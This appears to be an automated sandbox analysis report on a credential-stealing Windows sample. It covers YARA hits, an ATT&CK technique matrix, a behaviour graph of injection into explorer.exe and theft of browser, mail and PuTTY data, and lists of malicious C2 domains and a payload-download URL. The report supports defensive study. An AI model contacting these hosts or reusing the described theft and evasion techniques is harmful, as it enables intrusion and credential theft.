                Source: Yara matchFile source: 33.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.uievsid.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.38E5.exe.730000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.uievsid.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 412, type: MEMORYSTR
                Source: Yara matchFile source: 9.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.38E5.exe.610e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.38E5.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.uievsid.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.38E5.exe.730000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.uievsid.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                2
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                Data Encrypted for Impact
                CredentialsDomainsDefault Accounts12
                Native API
                Boot or Logon Initialization Scripts522
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                3
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                1
                Credentials in Registry
                249
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts12
                Command and Scripting Interpreter
                Login HookLogin Hook12
                Software Packing
                NTDS1
                Query Registry
                Distributed Component Object Model11
                Input Capture
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets871
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                File Deletion
                Cached Domain Credentials34
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job34
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt522
                Process Injection
                /etc/passwd and /etc/shadow1
                System Network Configuration Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Hidden Files and Directories
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524903 Sample: veEGy9FijY.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 53 nwgrus.ru 2->53 55 calvinandhalls.com 2->55 69 Multi AV Scanner detection for domain / URL 2->69 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 8 other signatures 2->75 10 veEGy9FijY.exe 2->10         started        13 haevsid 2->13         started        15 uievsid 2->15         started        17 3 other processes 2->17 signatures3 process4 signatures5 117 Detected unpacking (changes PE section rights) 10->117 119 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->119 121 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->121 123 Switches to a custom stack to bypass stack traces 10->123 19 explorer.exe 75 9 10->19 injected 125 Antivirus detection for dropped file 13->125 127 Multi AV Scanner detection for dropped file 13->127 129 Machine Learning detection for dropped file 13->129 131 Maps a DLL or memory area into another process 15->131 133 Checks if the current machine is a virtual machine (disk enumeration) 15->133 135 Creates a thread in another existing process (thread injection) 15->135 process6 dnsIp7 57 calvinandhalls.com 23.145.40.162, 443, 49766, 49767 SURFAIRWIRELESS-IN-01US Reserved 19->57 59 23.145.40.164, 443, 49762 SURFAIRWIRELESS-IN-01US Reserved 19->59 61 2 other IPs or domains 19->61 45 C:\Users\user\AppData\Roaming\uievsid, PE32 19->45 dropped 47 C:\Users\user\AppData\Roaming\haevsid, PE32 19->47 dropped 49 C:\Users\user\AppData\Local\Temp\BC8F.exe, PE32+ 19->49 dropped 51 2 other malicious files 19->51 dropped 83 System process connects to network (likely due to code injection or exploit) 19->83 85 Benign windows process drops PE files 19->85 87 Injects code into the Windows Explorer (explorer.exe) 19->87 89 3 other signatures 19->89 24 BC8F.exe 2 19->24         started        27 38E5.exe 19->27         started        29 explorer.exe 18 19->29         started        31 5 other processes 19->31 file8 signatures9 process10 signatures11 91 Multi AV Scanner detection for dropped file 24->91 93 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->93 95 Machine Learning detection for dropped file 24->95 97 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 24->97 33 cmd.exe 24->33         started        99 Antivirus detection for dropped file 27->99 101 Detected unpacking (changes PE section rights) 27->101 103 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 27->103 115 5 other signatures 27->115 105 System process connects to network (likely due to code injection or exploit) 29->105 107 Found evasive API chain (may stop execution after checking mutex) 29->107 109 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->109 111 Tries to steal Mail credentials (via file / registry access) 29->111 113 Tries to harvest and steal browser information (history, passwords, etc) 31->113 process12 signatures13 63 Uses netsh to modify the Windows network and firewall settings 33->63 65 Uses ipconfig to lookup or modify the Windows network settings 33->65 67 Modifies the windows firewall 33->67 36 WMIC.exe 33->36         started        39 systeminfo.exe 33->39         started        41 conhost.exe 33->41         started        43 17 other processes 33->43 process14 signatures15 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->77 79 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->79 81 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 36->81

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                veEGy9FijY.exe34%ReversingLabs
                veEGy9FijY.exe38%VirustotalBrowse
                veEGy9FijY.exe100%AviraHEUR/AGEN.1310247
                veEGy9FijY.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\haevsid100%AviraHEUR/AGEN.1310247
                C:\Users\user\AppData\Roaming\uievsid100%AviraHEUR/AGEN.1311799
                C:\Users\user\AppData\Local\Temp\38E5.exe100%AviraHEUR/AGEN.1311799
                C:\Users\user\AppData\Roaming\haevsid100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\uievsid100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\BC8F.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\38E5.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\BC8F.exe37%ReversingLabsWin64.Trojan.Generic
                C:\Users\user\AppData\Roaming\haevsid34%ReversingLabs
                No Antivirus matches
                SourceDetectionScannerLabelLink
                calvinandhalls.com5%VirustotalBrowse
                bg.microsoft.map.fastly.net0%VirustotalBrowse
                nwgrus.ru12%VirustotalBrowse
                fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                https://powerpoint.office.comcember0%URL Reputationsafe
                https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://excel.office.com0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                https://word.office.com0%URL Reputationsafe
                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://android.notify.windows.com/iOS0%URL Reputationsafe
                https://api.msn.com/0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
                https://aka.ms/odirmr0%VirustotalBrowse
                https://calvinandhalls.com/0%VirustotalBrowse
                https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.00%VirustotalBrowse
                https://23.145.40.164/ksa9104.exe0%VirustotalBrowse
                https://calvinandhalls.com/search.phpMozilla/5.00%VirustotalBrowse
                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
                https://calvinandhalls.com/search.php0%VirustotalBrowse
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
                https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
                https://api.msn.com/q0%VirustotalBrowse
                http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%VirustotalBrowse
                https://wns.windows.com/L0%VirustotalBrowse
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%VirustotalBrowse
                https://aka.ms/Vh5j3k0%VirustotalBrowse
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%VirustotalBrowse
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%VirustotalBrowse
                https://api.msn.com/v1/news/Feed/Windows?&0%VirustotalBrowse
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%VirustotalBrowse
                https://calvinandhalls.com/s4%VirustotalBrowse
                https://www.rd.com/list/polite-habits-campers-dislike/0%VirustotalBrowse
                https://bestworldhools.com/search.php0%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                calvinandhalls.com
                23.145.40.162
                truetrueunknown
                bg.microsoft.map.fastly.net
                199.232.210.172
                truefalseunknown
                nwgrus.ru
                58.151.148.90
                truetrueunknown
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                https://23.145.40.164/ksa9104.exetrueunknown
                https://calvinandhalls.com/search.phptrueunknown
                https://bestworldhools.com/search.phptrueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://calvinandhalls.com/explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.000000000358E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmptrueunknown
                https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalse
                • URL Reputation: safe
                unknown
                http://schemas.miexplorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://duckduckgo.com/ac/?q=explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://calvinandhalls.com/search.phpMozilla/5.0explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2875600167.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4140857927.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4139493088.0000000000498000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4140362492.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4139073414.00000000010E8000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalse
                      • URL Reputation: safe
                      unknown
                      https://excel.office.comexplorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.microexplorer.exe, 00000001.00000000.1726891163.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725351685.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725731451.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalse
                        • URL Reputation: safe
                        unknown
                        https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://api.msn.com/qexplorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1728229982.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://calvinandhalls.com/earch.phpxexplorer.exe, 0000000D.00000002.2910898340.0000000003530000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://calvinandhalls.com/search.phpGexplorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmptrue
                                  unknown
                                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1728229982.000000000C99F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1728229982.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    https://word.office.comexplorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalseunknown
                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.micrexplorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.ecosia.org/newtab/explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                            https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                            https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1726201886.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                            https://calvinandhalls.com/sexplorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
